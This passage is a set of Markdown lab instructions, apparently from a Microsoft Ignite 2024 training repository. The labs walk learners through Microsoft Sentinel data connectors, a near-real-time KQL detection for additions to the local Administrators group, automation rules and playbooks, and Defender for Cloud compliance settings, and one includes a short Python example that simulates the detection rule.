16 | 17 | ## Architecture diagram 18 | 19 | ![Diagram of Windows Security Events via AMA using DCR](../Media/apl-5001-lab-diagrams-lab03.png) 20 | 21 | ## Skilling tasks 22 | 23 | You need to validate the Microsoft Sentinel deployment to meet the following requirements: 24 | 25 | - Configure the Windows Security Events via AMA connector to collect all security events from only a virtual machine named VM1. 26 | - Create a near-real-time (NRT) query rule to generate an incident based on the following query. 27 | 28 | ```KQL 29 | SecurityEvent 30 | | where EventID == 4732 31 | | where TargetAccount == "Builtin\\Administrators" 32 | ``` 33 | 34 | - Create an automation rule that assigns Operator1 the Owner role for incidents that are generate by the NRT rule. 35 | 36 | ## Exercise instructions 37 | 38 | >**Note**: In the following tasks, to access `Microsoft Sentinel`, select the `workspace` you created in Lab 01. 39 | 40 | ### Task 1 - Configure Data Collection rules (DCRs) in Microsoft Sentinel 41 | 42 | Configure a Windows Security Events via AMA connector. Learn more about [Windows Security Events via AMA connector](https://learn.microsoft.com/azure/sentinel/data-connectors/windows-security-events-via-ama). 43 | 44 | 1. In `Microsoft Sentinel`, go to the `Configuration` menu section and select **Data connectors** 45 | 1. Search for and select **Windows Security Events via AMA** 46 | 1. Select **Open connector page** 47 | 1. In the `Configuration` area, select **+Create data collection rule** 48 | 1. On the `Basics` tab enter a `Rule Name` 49 | 1. On the `Resources` tab expand your subscription and the `RG1` resource group in the `Scope` column 50 | 1. Select `VM1`, and then select **Next: Collect >** 51 | 1. On the `Collect` tab leave the default of `All Security Events` 52 | 1. 
Select **Next: Review + create >**, then select **Create** 53 | 54 | ### Task 2 - Create a near real-time (NRT) query detection 55 | 56 | Detect threats with near-real-time (NRT) analytic rules in Microsoft Sentinel. Learn more about [NRT Analytic rules in Microsoft Sentinel](https://learn.microsoft.com/azure/sentinel/near-real-time-rules). 57 | 58 | 1. In `Microsoft Sentinel`, go to the `Configuration` menu section and select **Analytics** 59 | 1. Select **+ Create**, and **NRT query rule (Preview)** 60 | 1. Enter a `Name` for the rule, and select **Privilege Escalation** from `Tactics and techniques`. 61 | 1. Select **Next: Set rule logic >** 62 | 1. Enter the KQL query into the `Rule query`form 63 | 64 | ```KQL 65 | SecurityEvent 66 | | where EventID == 4732 67 | | where TargetAccount == "Builtin\\Administrators" 68 | ``` 69 | 70 | 1. Select **Next: Incident settings >**, and select **Next: Automated response >** 71 | 1. Select **Next: Review + Create** 72 | 1. When validation is complete select **Save** 73 | 74 | ### Task 3 - Configure automation in Microsoft Sentinel 75 | 76 | Configure automation in Microsoft Sentinel. Learn more about [Create and use Microsoft Sentinel automation rules](https://learn.microsoft.com/azure/sentinel/create-manage-use-automation-rules). 77 | 78 | 1. In `Microsoft Sentinel`, go to the `Configuration` menu section and select **Automation** 79 | 1. Select **+ Create**, and Automation rule 80 | 1. Enter an `Automation rule name`, and select **Assign owner** from `Actions` 81 | 1. Assign **Operator1** as the owner. 82 | 1. 
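Before saving the rule it helps to see exactly which rows the two `where` clauses accept. The following is an added example, not part of this lab, that replays the Task 2 NRT query and the Task 3 owner assignment in Python over constructed SecurityEvent rows; the row layout, the `Incident` class and the rule name are assumptions for illustration.

```python
# Added example (not part of the lab or the Sentinel product): the NRT rule
# query from Task 2 and the Task 3 automation rule, replayed offline over a
# few constructed SecurityEvent rows so the matching semantics can be checked
# before the rule is saved. The row dicts mimic SecurityEvent columns; the
# Incident class is a simplification, not the Sentinel incident schema.
from dataclasses import dataclass, field
from typing import Optional

# In the KQL string literal "Builtin\\Administrators" the doubled backslash is
# an escape for one backslash, so the rule compares against the table value
# Builtin\Administrators. Python uses the same escape, and KQL == is
# case-sensitive exactly like Python ==.
RULE_NAME = "Member added to Builtin\\Administrators"   # assumed rule name
RULE_EVENT_ID = 4732               # member added to a security-enabled local group
RULE_TARGET_ACCOUNT = "Builtin\\Administrators"
AUTOMATION_OWNER = "Operator1"     # Task 3: owner assigned by the automation rule


@dataclass
class Incident:
    rule_name: str
    title: str
    events: list = field(default_factory=list)
    owner: Optional[str] = None


def nrt_rule_matches(row: dict) -> bool:
    """The two `where` clauses of the NRT rule query, applied to one row."""
    return (row.get("EventID") == RULE_EVENT_ID
            and row.get("TargetAccount") == RULE_TARGET_ACCOUNT)


def run_nrt_rule(rows: list) -> Optional[Incident]:
    """One rule run: with the default 'group all events into a single alert'
    setting, a run that returns rows yields one alert and hence one incident."""
    hits = [r for r in rows if nrt_rule_matches(r)]
    if not hits:
        return None
    computers = sorted({r.get("Computer", "?") for r in hits})
    return Incident(rule_name=RULE_NAME,
                    title=f"{RULE_NAME} on {', '.join(computers)}",
                    events=hits)


def apply_automation_rule(incident: Incident) -> Incident:
    """Task 3 automation rule: incidents generated by the NRT rule get Operator1."""
    if incident.rule_name == RULE_NAME:
        incident.owner = AUTOMATION_OWNER
    return incident


# Constructed sample rows; only the columns the query touches are populated.
SAMPLE_ROWS = [
    {"EventID": 4732, "Computer": "VM1", "SubjectAccount": "VM1\\localadmin",
     "MemberName": "VM1\\svc-backup", "TargetAccount": "Builtin\\Administrators"},
    {"EventID": 4732, "Computer": "VM1", "SubjectAccount": "VM1\\localadmin",
     "MemberName": "VM1\\helpdesk", "TargetAccount": "Builtin\\Remote Desktop Users"},
    # 4728 is a security-enabled *global* group change; a different event ID.
    {"EventID": 4728, "Computer": "DC1", "SubjectAccount": "CONTOSO\\admin",
     "MemberName": "CONTOSO\\jdoe", "TargetAccount": "CONTOSO\\Domain Admins"},
    # Same group, different letter case: KQL == does NOT match this row; the
    # case-insensitive operator =~ would. Verify the case your data actually uses.
    {"EventID": 4732, "Computer": "VM1", "SubjectAccount": "VM1\\localadmin",
     "MemberName": "VM1\\tmpuser", "TargetAccount": "BUILTIN\\Administrators"},
]


def demo() -> Optional[Incident]:
    """Run the rule once over the sample rows and apply the automation rule."""
    incident = run_nrt_rule(SAMPLE_ROWS)
    if incident is None:
        print("no incident")
        return None
    apply_automation_rule(incident)
    print(f"{incident.title}: {len(incident.events)} event(s), owner={incident.owner}")
    return incident


if __name__ == "__main__":
    demo()
```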
Select **Apply** 83 | -------------------------------------------------------------------------------- /Instructions/Demos/Ignite_2024_Lab_452-03.md: -------------------------------------------------------------------------------- 1 | --- 2 | lab: 3 | title: 'Exercise 03: Connect Windows devices to Microsoft Sentinel using data connectors' 4 | module: 'Guided Project - Connect Windows devices to Microsoft Sentinel using data connectors' 5 | --- 6 | 7 | ## Exercise overview 8 | 9 | You're a Security Operations Analyst working at a company that implemented Microsoft Sentinel. You must learn how to connect log data from the many data sources in your organization. The next source of data is Windows virtual machines inside and outside of Azure, like On-Premises environments or other Public Clouds. 10 | 11 | ## Exercise instructions 12 | 13 | ### Task 1: Access the Microsoft Sentinel Workspace 14 | 15 | In this task, you will access your Microsoft Sentinel workspace. 16 | 17 | 1. Log in to WIN1 virtual machine as Admin with the password: Pa55w.rd. 18 | 19 | 1. Open the Microsoft Edge browser. 20 | 21 | 1. In the Edge browser, navigate to the Azure portal at . 22 | 23 | >**Note:** Select the **Resourses** tab for the *Username* and *Password* for the lab. Use the **** account for this lab. 24 | 25 | 1. In the Sign in dialog box, copy, and paste in the Tenant Email account provided by your lab hosting provider and then select Next. 26 | 27 | 1. In the Enter password dialog box, copy, and paste in the Tenant Password provided by your lab hosting provider and then select Sign in. 28 | 29 | 1. In the Search bar of the Azure portal, type Sentinel, then select Microsoft Sentinel. 30 | 31 | 1. Select your Microsoft Sentinel Workspace that you created in the previous lab. 32 | 33 | 1. Proceed to the next task. 34 | 35 | ### Task 2: Install the Windows Security Events solution 36 | 37 | 1. In the Search bar of the Azure portal, type *Sentinel*, then select **Microsoft Sentinel**. 
38 | 39 | 1. Select your Microsoft Sentinel Workspace you created earlier. 40 | 41 | 1. 1. In the Microsoft Sentinel left navigation menu, scroll down to the *Content management* section and select **Content Hub**. 42 | 43 | 1. In the *Content hub*, search for the **Windows Security Events** solution and select it from the list. 44 | 45 | 1. On the *Windows Security Events* solution page select **Install**. 46 | 47 | 1. When the installation completes select **Manage** 48 | 49 | >**Note:** The *Windows Security Events* solution installs both the *Windows Security Events via AMA* and the *Security Events via Legacy Agent* Data connectors. Plus 2 Workbooks, 20 Analytic Rules, and 43 Hunting Queries. 50 | 51 | 1. Select the *Windows Security Events via AMA* Data connector, and select **Open connector page** on the connector information blade. 52 | 53 | In the next task, we will setup this connector by creating data collection rule (DCR), and adding a Microsoft Azure Windows virtual machine to it. 54 | 55 | ### Task 3:  Connect an Azure Windows virtual machine to Microsoft Sentinel 56 | 57 | 1. In the Search bar of the Azure portal, type Sentinel, then select Microsoft Sentinel. 58 | 59 | 1. Select your Microsoft Sentinel Workspace you created earlier. 60 | 61 | 1. In the Microsoft Sentinel left navigation menu, scroll down to Configuration and select Data Connectors. 62 | 63 | 1. Look for the Windows Security Events via AMA connector that you created in the previous exercise. 64 | 65 | 1. Select the Windows Security Events via AMA Data connector and select Open connector page on the connector information blade. 66 | 67 | 1. In the *Configuration* section, under the *Instructions* tab, select the **Create data collection rule**. 68 | 69 | 1. Enter **AZWINDCR** for Rule Name, then select **Next: Resources**. 70 | 71 | 1. Select **+Add resource(s)** to select the Virtual Machine we created. 72 | 73 | 1. 
Expand the *MOC Subscription-lodxxxxxxxx* subscription and the **RG2** resource group, then select **VM1**. 74 | 75 | 1. Select **Next: Collect**. 76 | 77 | 1. Review the different Security Event collection option. Keep *All Security Events* and then select **Next: Review + create**. 78 | 79 | 1. Select **Create** to save the Data Collection Rule. 80 | 81 | 1. It will take a few minutes to see the new data collection rule listed. You can select **Refresh** as needed. You can also select the *Bell* notification icon to see the progress of the rule creation. You should see that the rule creation "Successflly installed" the AMA agent extension on the VM1 virtual machine". 82 | 83 | ## Proceed to Exercise 4 84 | -------------------------------------------------------------------------------- /Instructions/Demos/Ignite_2024_Lab_452-05.md: -------------------------------------------------------------------------------- 1 | --- 2 | lab: 3 | title: 'Exercise 05: Create a Playbook' 4 | module: 'Guided Project - Create detections and perform investigations using Microsoft Sentinel' 5 | --- 6 | 7 | ## Exercise overview 8 | 9 | You’re a Security Operations Architect working at a company that implemented Microsoft Sentinel. You must learn how to detect and mitigate threats using Microsoft Sentinel. Now, you want to respond and remediate actions that can be run from Microsoft Sentinel as a routine. 10 | 11 | With a playbook, you can help automate and orchestrate your threat response, integrate with other systems both internal and external, and can be set to run automatically in response to specific alerts or incidents, when triggered by an analytics rule or an automation rule, respectively. With automation rules, you can apply automation for minimal to large tasks across one or more incidents/alerts in order to efficiently and optimally respond to threats and tasks. 
12 | 13 | ## Exercise instructions 14 | 15 | ### Task 1: Create a Playbook in Microsoft Sentinel 16 | 17 | In this task, you’ll create a Logic App that is used as a Playbook in Microsoft Sentinel. 18 | 19 | 1. In *Microsoft Sentinel*, navigate to **Content Hub**. 20 | 21 | 1. Within the search bar, look for **Sentinel SOAR Essentials**. 22 | 23 | 1. Select the solution that appears in the results. 24 | 25 | 1. Within the solution details, select **Install**. 26 | 27 | 1. Once installed, select Manage. 28 | 29 | 1. Find the **Defender_XDR_Ransomware_Playbook_for_SecOps_Tasks** playbook and select it. 30 | 31 | 1. Select the **Incident tasks - Microsoft Defender XDR Ransomware Playbook for SecOps** template. 32 | 33 | 1. On the details pane, select **Create playbook**. 34 | 35 | 1. For Resource Group, select **Create New**, enter **RG-Playbooks** and select OK. 36 | 37 | 1. Remove *for* from the name (limit of 64 exceeded). 38 | 39 | 1. Select **Connections**. 40 | 41 | 1. Select **Next: Review and create**. 42 | 43 | 1. Now select **Create Playbook**. 44 | 45 | >**Note:** Wait for the deployment to finish before proceeding to the next task. 46 | 47 | ### Task 2: Update a Playbook in Microsoft Sentinel 48 | 49 | In this task, you’ll update the new playbook you created with the proper connection information. 50 | 51 | 1. In the Search bar of the Azure portal, type Sentinel, then select Microsoft Sentinel. 52 | 53 | 1. Select your Microsoft Sentinel Workspace. 54 | 55 | 1. Select Automation under the Configuration area and then select the Active Playbooks tab. 56 | 57 | 1. Select Refresh from the command bar in case you don’t see any playbooks. You should see the playbook created from the previous step. 58 | 59 | 1. Select the **Defender_XDR_Ransomware_Playbook_SecOps_Tasks** playbook name. 60 | 61 | 1. On the Logic App page for **Defender_XDR_Ransomware_Playbook_SecOps_Tasks**, in the command menu, select Edit. 62 | 63 | >**Note:** You may need to refresh the page. 
64 | 65 | 1. Select the first block, Microsoft Sentinel incident. 66 | 67 | 1. Select the Change connection link. 68 | 69 | 1. Select Add new and select Sign in. In the new window, select your Azure subscription admin credentials when prompted. The last line of the block should now read “Connected to your-admin-username”. 70 | 71 | 1. Below within the logic split, select Add task to incident. 72 | 73 | 1. Select Save on the command bar. The Logic App will be used in a future lab. 74 | 75 | ### Task 3: Create an Automation Rule 76 | 77 | 1. Within Microsoft Sentinel, go to Automation under Configuration. 78 | 79 | 1. Select Create and choose Automation Rule. 80 | 81 | 1. Give the rule a name 82 | 83 | 1. Leave the incident provider as All. 84 | 85 | 1. Leave the Analytic rule name as All. 86 | 87 | 1. Click Add and choose And. 88 | 89 | 1. From the drop down, select Tactics. 90 | 91 | 1. Select the following: 92 | - Reconnaissance 93 | - Execution 94 | - Persistence 95 | - Command and Control 96 | - Exfiltration 97 | - PreAttack 98 | 99 | 1. Under Actions, select Run Playbook. 100 | 101 | 1. Select Manage playbook permissions. 102 | 103 | 1. Find the resource group, select it, and select apply. 104 | 105 | 1. From the drop down list, select the **Defender_XDR_Ransomware_Playbook_SecOps_Tasks** playbook. 106 | 107 | 1. Select Apply at the bottom. 108 | From here, depending on your role, you will either continue doing more architect exercises or you will pivot to the analyst exercises. 
109 | 110 | ## You have completed the lab 111 | -------------------------------------------------------------------------------- /Instructions/Demos/Ignite_2024_Lab_452-02.md: -------------------------------------------------------------------------------- 1 | --- 2 | lab: 3 | title: 'Exercise 02: Connect data sources to Microsoft Sentinel' 4 | module: 'Guided Project - Connect data sources to a Microsoft Sentinel workspace' 5 | --- 6 | 7 | ## Exercise overview 8 | 9 | You are a Security Operations Architect working at a company that implemented Microsoft Sentinel. You must learn how to connect log data from the many data sources in your organization. The organization has data from Microsoft 365, Microsoft Defender, Azure resources, and non-azure virtual machines. As they are the easiest to do, you will start by connecting the Microsoft sources first. 10 | 11 | ## Exercise instructions 12 | 13 | ### Task 1 - Access the Microsoft Sentinel workspace 14 | 15 | In this task, you will access your Microsoft Sentinel workspace. 16 | 17 | 1. Log in to WIN1 virtual machine as Admin with the password: Pa55w.rd. 18 | 19 | 1. Open the Microsoft Edge browser. 20 | 21 | 1. In the Edge browser, navigate to the Azure portal at . 22 | 23 | 1. In the Sign in dialog box, copy, and paste in the Tenant Email account provided by your lab hosting provider and then select Next. 24 | 25 | 1. In the Enter password dialog box, copy, and paste in the Tenant Password provided by your lab hosting provider and then select Sign in. 26 | 27 | 1. In the Search bar of the Azure portal, type Sentinel, then select Microsoft Sentinel. 28 | 29 | 1. Select your Microsoft Sentinel Workspace that you created in the previous lab. 30 | 31 | 1. Proceed to the next task. 32 | 33 | ### Task 2 - Connect the Microsoft Defender for Cloud data connector 34 | 35 | In this task, you will connect the Microsoft Defender for Cloud data connector. 36 | 37 | 1. 
In the Microsoft Sentinel left navigation menu, scroll down to the Content management section and select Content Hub. 38 | 39 | 1. In the Content hub, search for the **Microsoft Defender for Cloud** solution and select it from the list. 40 | 41 | 1. On the Microsoft Defender for Cloud solution details page select Install. 42 | 43 | 1. When the installation completes, search for the Microsoft Defender for Cloud solution and select it. 44 | 45 | 1. On the Microsoft Defender for Cloud solution details page select Manage 46 | 47 | >**Note:** The Microsoft Defender for Cloud solution installs the Subscription-based Microsoft Defender for Cloud (Legacy) Data connector, the Tenant-based Microsoft Defender for Cloud (Preview) Data connector, and an Analytics rule. The Tenant-based Microsoft Defender for Cloud (Preview) Data connector is used when a tenant has multiple subscriptions. 48 | 49 | 1. Select the Subscription-based **Microsoft Defender for Cloud (Legacy)** Data connector check-box, and select Open connector page. 50 | 51 | 1. In the Configuration section, under the Instructions tab, select the checkbox for the hosted subscription and slide the Status option to the right. 52 | 53 | **Note:** If it switches back to disconnected, please review the prerequisites and confirm you have been assigned the proper permissions to modify the data connector. 54 | 55 | 1. The Status should be now Connected and “Bi-directional sync” should be Enabled. 56 | 57 | ### Task 3: Connect a Threat Intelligence Feed 58 | 59 | In this task, you will set up the Microsoft Defender Threat Intelligence Connector. 60 | 61 | 1. In the Microsoft Sentinel left navigation menu, scroll down to the Content management section and select Content Hub. 62 | 63 | 1. In the Content hub, search for the **Threat Intelligence** solution and select it from the list. 64 | 65 | 1. On the solution page, select Install. 66 | 67 | 1. When the installation completes, select Manage. 68 | 69 | 1. 
Select the **Microsoft Defender Threat Intelligence (Preview)** data connector and select Open connector page. 70 | 71 | 1. Under the configuration steps, click on the button to install. 72 | 73 | ### Task 4: Connect the Azure Activity data connector 74 | 75 | In this task, you will connect the *Azure Activity* data connector. 76 | 77 | 1. In the Microsoft Sentinel left menus, scroll down to the *Content management* section and select **Content Hub**. 78 | 79 | 1. In the *Content hub*, search for the **Azure Activity** solution and select it from the list. 80 | 81 | 1. On the *Azure Activity* solution page select **Install**. 82 | 83 | 1. When the installation completes select **Manage** 84 | 85 | >**Note:** The *Azure Activity* solution installs the *Azure Activity* Data connector, 12 Analytic rules, 14 Hunting queries and 1 Workbook. 86 | 87 | 1. Select the *Azure Activity* Data connector and select **Open connector page**. 88 | 89 | 1. In the *Configuration* area under the *Instructions* tab, scroll down to "2. Connect your subscriptions...", and select **Launch Azure Policy Assignment Wizard>**. 90 | 91 | 1. In the **Basics** tab, select the ellipsis button (...) under **Scope** and select your "MOC Subscription-lodxxxxxxxx" subscription from the drop-down list and click **Select**. 92 | 93 | 1. Select the **Parameters** tab, choose your *uniquenameDefender* workspace from the **Primary Log Analytics workspace** drop-down list. This action will apply the subscription configuration to send the information to the Log Analytics workspace. 94 | 95 | 1. Select the **Remediation** tab and select the **Create a remediation task** checkbox. This action will apply the policy to existing Azure resources. 96 | 97 | >**Note**: The remediation task creates a "managed identity" in the default "US East" region. You can change the region if you created the Log Analytics workspace in a different region. 98 | 99 | 1. 
Select the **Review + Create** button to review the configuration. 100 | 101 | 1. Select **Create** to finish. 102 | 103 | ## Proceed to Exercise 3 104 | -------------------------------------------------------------------------------- /Instructions/Demos/Ignite_2024_Lab_452-04.md: -------------------------------------------------------------------------------- 1 | --- 2 | lab: 3 | title: 'Exercise 04: Create a Scheduled Query from a template' 4 | module: 'Guided Project - Create detections and perform investigations using Microsoft Sentinel' 5 | --- 6 | 7 | ## Exercise overview 8 | 9 | You're a Security Operations Analyst working at a company that implemented Microsoft Sentinel. You must learn how to detect and mitigate threats using Microsoft Sentinel. After connecting your data sources to Microsoft Sentinel, you create custom analytics rules to help discover threats and anomalous behaviors in your environment. 10 | 11 | Analytics rules search for specific events or sets of events across your environment, alert you when certain event thresholds or conditions are reached, generate incidents for your SOC to triage and investigate, and respond to threats with automated tracking and reMediation processes. 12 | 13 | ## Exercise instructions 14 | 15 | ### Task 1: Create a Scheduled Query 16 | 17 | In this task, you create a scheduled query and connect it to the Teams channel you created in the previous exercise. 18 | 19 | 1. Log in to WIN1 virtual machine as Admin with the password: **Pa55w.rd**. 20 | 21 | 1. In the **Sign in** dialog box, copy and paste in the **Tenant Email** account provided by your lab hosting provider and then select **Next**. 22 | 23 | 1. In the **Enter password** dialog box, copy and paste in the **Tenant Password** provided by your lab hosting provider and then select **Sign in**. 24 | 25 | 1. In the Search bar of the Azure portal, type *Sentinel*, then select **Microsoft Sentinel**. 26 | 27 | 1. Select your Microsoft Sentinel Workspace. 
28 | 29 | 1. Select **Analytics** from the Configuration area. 30 | 31 | 1. Make sure that you are in the *Rule templates* tab in the command bar and search for the **New CloudShell User** rule. 32 | 33 | 1. Select the **New CloudShell User** rule template, and "right-click" to open and select the **+ Create rule** button to open the *Analytic rule wizard*. 34 | 35 | >**Note:** You can also select the *ellipsis icon* (...) on the *New CloudShell User* rule template to open the *+ Create rule* wizard. 36 | 37 | 1. From the rule summary blade, make sure you're receiving data by reviewing the green icon under *Data sources: Azure Activity*. 38 | 39 | >**Note:** If you do not see it in a connected state, make sure you completed Task 3 of the Learning Path 6 Lab, Exercise 1. ---> 40 | 41 | 1. Select **Create rule** to continue. 42 | 43 | 1. In the Analytics rule wizard, on the *General* tab, change the *Severity* to **Medium**. 44 | 45 | 1. Select **Next: Set rule logic >** button: 46 | 47 | 1. For the rule query, select **View query results**. You shouldn't receive any results nor any errors. 48 | 49 | 1. Close the *Logs* window by selecting the upper right **X** and select **OK** to discard to save changes to go back to the wizard. 50 | 51 | 1. Scroll down and under *Query scheduling* set the following: 52 | 53 | |Setting|Value| 54 | |---|---| 55 | |Run Query every|5 minutes| 56 | |Lookup data from the last|1 Days| 57 | 58 | >**Note:** We are purposely generating many incidents for the same data. This enables the Lab to use these alerts. 59 | 60 | 1. Under the *Alert threshold* area, leave the value unchanged since we want the alert to register every event. 61 | 62 | 1. Under the *Event grouping* area, leave the **Group all events into a single alert** as the selected option since we want to generate a single alert every time it runs, as long as the query returns more results than the specified alert threshold above. 63 | 64 | 1. 
Select the **Next: Incident settings >** button. 65 | 66 | 1. On the *Incident settings* tab, review the default options. 67 | 68 | 1. Select the **Next: Automated response >** button. 69 | 70 | 71 | 1. Select the **Next: Review and create >** button. 72 | 73 | 1. Select **Save**. 74 | 75 | ### Task 2: Test your new rule 76 | 77 | In this task, you test your new scheduled query rule. 78 | 79 | 80 | 1. In the top bar of the Azure portal, Select the icon **>_** that corresponds to the Cloud Shell. You might need to select the ellipsis icon first **(...)** if your display resolution is too low. 81 | 82 | 1. In the *Welcome to Azure Cloud Shell* window, select **Powershell**. 83 | 84 | 1. On the *Getting started* page, select **Mount storage account**, and then select your **MOC subscription-lodxxxxxxxx** from the *storage account subscription* drop-down menu item and select the **Apply** button. 85 | 86 | >**Important:** Do not select the *No storage account required* radio button option. This wil cause the incident creation to fail. 87 | 88 | 1. On the *Mount storage account* page, select **We will create a storage account for you**, and then select **Next**. 89 | 90 | 1. Wait until the Cloud Shell is provisioned, then close the Azure Cloud Shell window. 91 | 92 | 1. In the Search bar of the Azure portal, type *Activity* and then select **Activity Log**. 93 | 94 | 1. Make sure the following *Operation name* items appear: **List Storage Account Keys** and **Update Storage Account Create**. These are the operations that the KQL query you reviewed earlier will match to generate the alert. **Hint:** You might need to select **Refresh** to update the list. 95 | 96 | 1. In the Search bar of the Azure portal, type *Sentinel*, then select **Microsoft Sentinel**. 97 | 98 | 1. Select your Microsoft Sentinel Workspace. 99 | 100 | 1. Select the **Incidents** menu option under *Threat management*. 101 | 102 | 1. Select the **Auto-refresh incidents** toggle. 103 | 104 | 1. 
You should see the newly created Incident. 105 | 106 | >**Note:** The event that triggers the incident may take 5+ minutes to process. Continue with the next exercise, you will come back to this view later. 107 | 108 | 1. Select the Incident and review the information in the right blade. 109 | 110 | ## Proceed to Exercise 5 111 | -------------------------------------------------------------------------------- /Instructions/Demos/Ignite_2024_Lab_455-01.md: -------------------------------------------------------------------------------- 1 | --- 2 | lab: 3 | title: 'Exercise 1 - Enable Microsoft Defender for Cloud' 4 | module: 'Mitigate threats using Microsoft Defender for Cloud' 5 | --- 6 | 7 | # Exercise 1 - Enable Microsoft Defender for Cloud 8 | 9 | ## Lab scenario 10 | 11 | You're a Security Operations Analyst working at a company that is implementing cloud workload protection with Microsoft Defender for Cloud. In this lab, you enable Microsoft Defender for Cloud. 12 | 13 | ### Task 1: Create a Log Analytics Workspace 14 | 15 | In this task, you create a Log Analytics workspace for use with Azure Monitoring, Microsoft Sentinel and Microsoft Defender for Cloud. 16 | 17 | 1. In the Microsoft Edge browser, navigate to the Azure portal at . 18 | 19 | >**Note:** Select the **Resourses** tab for the *Username* and *Password* for the lab. Use the **** account for this lab. 20 | 21 | 1. In the **Sign in** dialog box, copy, and paste in the tenant Email account for the admin username provided by your lab hosting provider and then select **Next**. 22 | 23 | 1. In the **Enter password** dialog box, copy, and paste in the admin's tenant password provided by your lab hosting provider and then select **Sign in**. 24 | 25 | 1. In the Search bar of the Azure portal, type *Log Analytics workspaces*, then select the same service name. 26 | 27 | 1. Select **+Create** from the command bar. 28 | 29 | 1. Select **Create new** for the Resource group. 30 | 31 | 1. 
Enter *RG-Defender* and select **Ok**. 32 | 33 | 1. For the Name, enter **wrkspcIgnite**. 34 | 35 | 1. Select **Review + Create**. 36 | 37 | 1. Once the workspace validation has passed, select **Create**. Wait for the new workspace to be provisioned, this may take a few minutes. 38 | 39 | ### Task 2: Enable Microsoft Defender for Cloud 40 | 41 | In this task, you'll enable and configure Microsoft Defender for Cloud. 42 | 43 | 1. Log in to **SEA-DEV** virtual machine as Admin with the password: **Pa55w.rd**. 44 | 45 | 1. Open the Microsoft Edge browser or open a new tab if already open. 46 | 47 | 1. In the Search bar of the Microsoft Azure portal, type *Defender*, then select **Microsoft Defender for Cloud**. 48 | 49 | 1. In the left navigation menu for Microsoft Defender for Cloud, expand the Management section , and select **Environment settings**. 50 | 51 | 1. Select the **MOC Subscription-lodxxxxxxxx** subscription (or equivalent name in your Language). 52 | 53 | 1. Review the Azure resources that are now protected with the Defender for Cloud plans. 54 | 55 | >**Important:** If all Defender plans are *Off*, select **Enable all plans**. Select the *$200/month Microsoft Defender for APIs Plan 1* and then select **Save**. Select **Save** at the top of the page and wait for the *"Defender plans (for your) subscription were saved successfully!"* notifications to appear. 56 | 57 | 1. Select the **Settings & monitoring** tab from the Settings area (next to Save). 58 | 59 | 1. Review the monitoring extensions. It includes configurations for Virtual Machines, Containers, and Storage Accounts. Close the "Settings & monitoring" page by selecting the 'X' on the upper right of the page. 60 | 61 | 1. Close the settings page by selecting the 'X' on the upper right of the page to go back to the **Environment settings** and select the '>' to the left of your subscription. 62 | 63 | 1. 
Select the Log analytics workspace you created earlier *uniquenameDefender* to review the available options and pricing. 64 | 65 | 1. Select **Enable all plans** (to the right of Select Defender plan) and then select **Save**. Wait for the *"Microsoft Defender plan for workspace uniquenameDefender were saved successfully!"* notification to appear. 66 | 67 | >**Note:** If the page is not being displayed, refresh your Edge browser and try again. 68 | 69 | 1. Close the Defender plans page by selecting the 'X' on the upper right of the page to go back to the **Environment settings** 70 | 71 | ### Task 3: Understanding the Microsoft Defender for Cloud Dashboard 72 | 73 | 1. In the Search bar of the Microsoft Azure portal, type *Defender*, then select **Microsoft Defender for Cloud**. 74 | 75 | 1. In the left navigation menu for Microsoft Defender for Cloud, under the *General* section, select **Overview**. 76 | 77 | 1. The Overview blade provides a unified view into the security posture and includes multiple independent cloud security pillars such as Security posture, Regulatory compliance, Workload protections, Firewall Manager, Inventory, and Information Protection (preview). Each of these pillars also has its dedicated dashboard allowing deeper insights and actions around that vertical, providing easy access and better visibility for security professionals. 78 | 79 | >**Note:** The top menu bar allows you to view and filter subscriptions by selecting the Subscriptions button. In this lab, we will use only one but selecting different/additional subscriptions will adjust the interface to reflect the security posture of the selected subscriptions 80 | 81 | 1. Click on the **What’s new** icon link – a new tab opens with the latest release notes where you can stay current on the new features, bug fixes, and more. 
82 | 83 | >**Note:** The high-level numbers at the top menu; This view allows you to see a summary of your subscriptions, active recommendations, and security alerts alongside connected cloud accounts. 84 | 85 | 1. From the top menu bar, select **Azure subscriptions**. This will bring you into the environment settings where you can select from the available subscriptions. 86 | 87 | 1. Return to the **Overview** page, and review the **Security posture** tile. You can see your current *Secure score* along with the number of completed controls and recommendations. Selecting this tile will redirect you to a drill-down view across subscriptions 88 | 89 | 1. On the **Regulatory compliance** tile, you can get insights into your compliance posture based on continuous assessment of both Azure and hybrid cloud environments. This tile shows the following standards which are Microsoft Cloud Security benchmark, and Lowest compliance regulatory standard. To view the data we first need to add Security policies. 90 | 91 | 1. Selecting this tile will redirect you to the **Regulatory compliance** dashboard – where you can add additional standards and explore the current ones 92 | 93 | 1. We will continue exploring *Microsoft Defender for Cloud* **Security posture** and **Regulatory compliance** in the next exercise. 94 | 95 | ## Proceed to Exercise 2 96 | -------------------------------------------------------------------------------- /Instructions/Demos/Ignite_2024_Lab_455-02.md: -------------------------------------------------------------------------------- 1 | --- 2 | lab: 3 | title: 'Exercise 2 - Mitigate threats using Microsoft Defender for Cloud' 4 | module: 'Mitigate threats using Microsoft Defender for Cloud' 5 | --- 6 | 7 | # Exercise 2 - Understanding Microsoft Defender for Cloud Dashboard 8 | 9 | ## Lab scenario 10 | 11 | You're a Security Operations Analyst working at a company that implemented Microsoft Defender for Cloud. 
You need to respond to recommendations and security alerts generated by Microsoft Defender for Cloud.

### Task 1: Explore Regulatory Compliance

In this task, you'll review the Regulatory compliance configuration in Microsoft Defender for Cloud.

1. Log in to the **SEA-DEV** virtual machine as Admin with the password: **Pa55w.rd**.

1. In the Microsoft Edge browser, open the Azure portal at .

1. In the **Sign in** dialog box, copy and paste in the **Tenant Email** account provided by your lab hosting provider and then select **Next**.

1. In the **Enter password** dialog box, copy and paste in the **Tenant Password** provided by your lab hosting provider and then select **Sign in**.

1. In the Search bar of the Microsoft Azure portal, type *Defender*, then select **Microsoft Defender for Cloud**.

1. Under *Cloud Security*, select **Regulatory compliance** from the left menu items.

>Lab Tip - If you are seeing the Regulatory Compliance page with data, please **Refresh** your browser.

1. Select **Manage compliance standards** on the toolbar.

1. Select your subscription.

>**Hint:** Select **Expand all** to find your subscription if you have a hierarchy of Management Groups.

1. Under *Settings*, select **Security policies** in the portal menu.

1. Scroll down and review the "Security standards" available to you by default.

1. Use the search box to find *ISO 27001:2013*.

1. Select and move the **Status** slider to the right of *ISO 27001:2013* to **On**.

>**Note:** Some standards require you to assign an Azure Policy initiative.

1. Select **Refresh** on the page menu to confirm that *ISO 27001:2013* is set to *On* for your subscription.

1. Next, on the **Security policies** page, search for **SOC 2 Type 2** in the search bar. Select the toggle button to change the status to On.

